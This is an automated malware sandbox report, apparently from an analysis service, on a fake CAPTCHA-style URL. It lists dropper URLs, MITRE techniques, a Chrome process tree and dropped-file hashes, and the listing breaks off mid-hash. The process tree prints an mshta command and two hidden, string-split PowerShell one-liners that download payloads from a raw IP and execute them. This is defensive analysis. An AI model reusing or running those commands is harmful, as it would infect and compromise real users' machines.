hxxps://rewiewe-cheksdin[.]com/?__cf_chl_tk=0nE7XstTWtNOBCB9IQMqGid8fjmvUaoKVVXpiHS3BWY-1740668179-1[.]0[.]1[.]1-GnzoQ_xYIVs4SLz0xWsEytSBU4JtB_aR79Cj_4[.]FVW4

Analysis

max time kernel
78s
max time network
247s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01/03/2025, 03:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://rewiewe-cheksdin.com/?__cf_chl_tk=0nE7XstTWtNOBCB9IQMqGid8fjmvUaoKVVXpiHS3BWY-1740668179-1.0.1.1-GnzoQ_xYIVs4SLz0xWsEytSBU4JtB_aR79Cj_4.FVW4

Score

10^/10

discovery execution

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://x10mrn-point.cfd/58YFQMZ5RYqRrBWD.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.211/a.mp4

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.211/b.mp4

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
59	1864	mshta.exe
61	1864	mshta.exe
64	1692	powershell.exe
65	2332	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1692	powershell.exe
2332	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3016	chrome.exe
3016	chrome.exe
1692	powershell.exe
2332	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe
Token: SeShutdownPrivilege	3016	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe
3016	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3016 wrote to memory of 2648	3016	chrome.exe	31
PID 3016 wrote to memory of 2648	3016	chrome.exe	31
PID 3016 wrote to memory of 2648	3016	chrome.exe	31
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2596	3016	chrome.exe	33
PID 3016 wrote to memory of 2728	3016	chrome.exe	34
PID 3016 wrote to memory of 2728	3016	chrome.exe	34
PID 3016 wrote to memory of 2728	3016	chrome.exe	34
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35
PID 3016 wrote to memory of 2608	3016	chrome.exe	35

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://rewiewe-cheksdin.com/?__cf_chl_tk=0nE7XstTWtNOBCB9IQMqGid8fjmvUaoKVVXpiHS3BWY-1740668179-1.0.1.1-GnzoQ_xYIVs4SLz0xWsEytSBU4JtB_aR79Cj_4.FVW4
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7249758,0x7fef7249768,0x7fef7249778
  2⤵
  PID:2648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:2
  2⤵
  PID:2596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:2728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:2608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2308 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:1
  2⤵
  PID:2912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2328 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1412 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:2
  2⤵
  PID:1944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3848 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:1416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1136 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:1
  2⤵
  PID:468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3624 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:1
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3316 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:2220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3932 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4044 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:1896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3384 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:1652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3956 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:1
  2⤵
  PID:2936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=1356 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3420 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:1840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=2096 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:1
  2⤵
  PID:2296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3216 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:3044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2384 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:3052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4220 --field-trial-handle=1380,i,11800178626802762442,14393430826073961414,131072 /prefetch:8
  2⤵
  PID:568

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1836

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://x10mrn-point.cfd/58YFQMZ5RYqRrBWD.html #'' I'm human ID216094''
1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/a.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/b.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2332

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
71KB

MD5
83142242e97b8953c386f988aa694e4a

SHA1
833ed12fc15b356136dcdd27c61a50f59c5c7d50

SHA256
d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

SHA512
bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
4f062b18111ed7062de3a777c0c5648c

SHA1
6a68e54b23aec4cd7244351b862a140af0308635

SHA256
5a17c5cbcda21ecff026c838e23a729400791e8b088a0adead08c67020b1f8e0

SHA512
ed0605b0e7924c3b5fd2a57f894cbbe3868c945cc9c47ae460ba9cd919d6ee4ce6d192b3136ad80d5fb4321845b6cb7ae99d64a5b5c70de9dd1745e45c08c477

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
53335c61222219102341ff9b1e1ccc03

SHA1
3861a928fdb4b511322175321d88f3536475981d

SHA256
855c5c64236ae9e6417e87b56c30525bc7287fe443745fb87112ea02f70a5db9

SHA512
1fe6e3d58ff7d67d3be74f99ae4afc9f13de82f0ebc51ce7dc96762cb8970ef77ac26b7783e6c5ef705e3eebaedbfb191c1c40b75cd4f2b7ae41370ec5e1b0c3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cba3324273e80af2c1e5e0bdd3cc41fe

SHA1
1b244cfc79c5617d928ba7f413d79ba54399cd59

SHA256
d04735e40546e0872c2ce8c2f9fd319ac94e311fd48a8448404a86d0b95eb553

SHA512
fdc0ae09a6d9f020db6cb2b11f3c2f43145d1c7cca0b971c04a739514cb406a0ac27868370e82eb45f61feac41583ab1795e97a1f78deda8321a2172c28ce46c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d7cea1431101ffc048aaed5dcef10cdc

SHA1
d6d393f5f3515054fe51f2b9cebfcfec454f450d

SHA256
294356976f0a76b5ef7d766740b93194e0c27c76699c55b5be1a9fcf621a0607

SHA512
1afbb6d87ba37e66af30b8c69acb49acb993751709ab0c1ad1f75335459c78377b41449507c10d84848d4183bbdaa967476717e1b621ae8105397e4507925c5c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ad857707d72dde5e4056989e13f8eacc

SHA1
8a94866f34d1b9f30f78bbcfe4bbfab97ba4edd2

SHA256
2ef73e61e7575946b1217984cdc6fb6350c32c551ab745671857cbe4c2be2ed6

SHA512
4f3ab38e53eea2cd859a3de7f9218236bc09c75d392e73134dc7ad751691650ab1fced47e413ed38bbd6148ecd788013bb58c4a0202a35d825bc7b0b9cfeb158

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\3469dcfa-20c6-49e1-9c61-28d432b8dd5b.tmp

Filesize
6KB

MD5
905b1289dcc97e9c4abe702744eba42b

SHA1
740a1bf1c5e81c31b3ae7bb73e890bb1084cc861

SHA256
7caf3aa7ea3dd5f415e74333662c2ffc399a089706da3566604cf4d4990ac422

SHA512
f3fab16e4304661919b59b403e82e605de757d2a4b170008fb6fd31557d771a39c423295e7862838836510c0dbcb86f78ab2dc09d47183c368132425058acfa8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
a2ebac28db75ebabf08232f7a7913215

SHA1
23cfd212a6c2aeb376b9698b3ced73ba9b129214

SHA256
4dfba4065a7cbe5d4ebb0c0550e1f0c93c61ebb2476772fa7f7fd663cdc484a5

SHA512
bd762696e7600f3cbbf55ed3a73a458af93cd387f3d6839f32fa2507c750673bd3657255691a77e74098b50a50623490a882f1080c91ecd471eefc71d4527395

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
987B

MD5
18521fe9dcbfb25afa0bb460214290c0

SHA1
5dd0da6874660e1251dc78502d0f81f7f9a0622c

SHA256
4cf17c3090899d2159a7b697e57ab4e416d3ef984a490638b3ebc0ae14fb67d4

SHA512
15967123517cdd8f22ed2a5066df59151703e5b389da965eac160b806e543040a78badfc8c0655024701d162c8497f622532738b5af8b84a2b6647b8312dda97

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
682B

MD5
90452ebbc473b7be9a3feb918e673981

SHA1
28d8fc8ae09362a5149444632150b1b170f79916

SHA256
47bcfa75019b6c148dda34c74503d165e24714d928603239e7ef424cb6dabaf0

SHA512
3cad8769398d55c1410be8658bc19cc6713e425ab6888fcdd8474a83af61a1c645522c5159e527dc0a79b001b452b92e33d27661d9dbe4a440350adafa6f318c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
682B

MD5
6b04626731c8b5ecc50798712d174df4

SHA1
676795abfaa570756be0971006841f304b66f8d6

SHA256
8a429e6e0532774d05fc3ba6f93bd706515eabe9f04f5aaa5ce464d3b55335ff

SHA512
6e9d0adc6460b5a13a9d04c3f91422203d8376250ca5de97871b4939fef6f2ae44977c162210b2a3adef1c4a1a75957fe289e348301c97834a3a27aee37d1235

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
7cf6b32869784d237dd4396f328ff609

SHA1
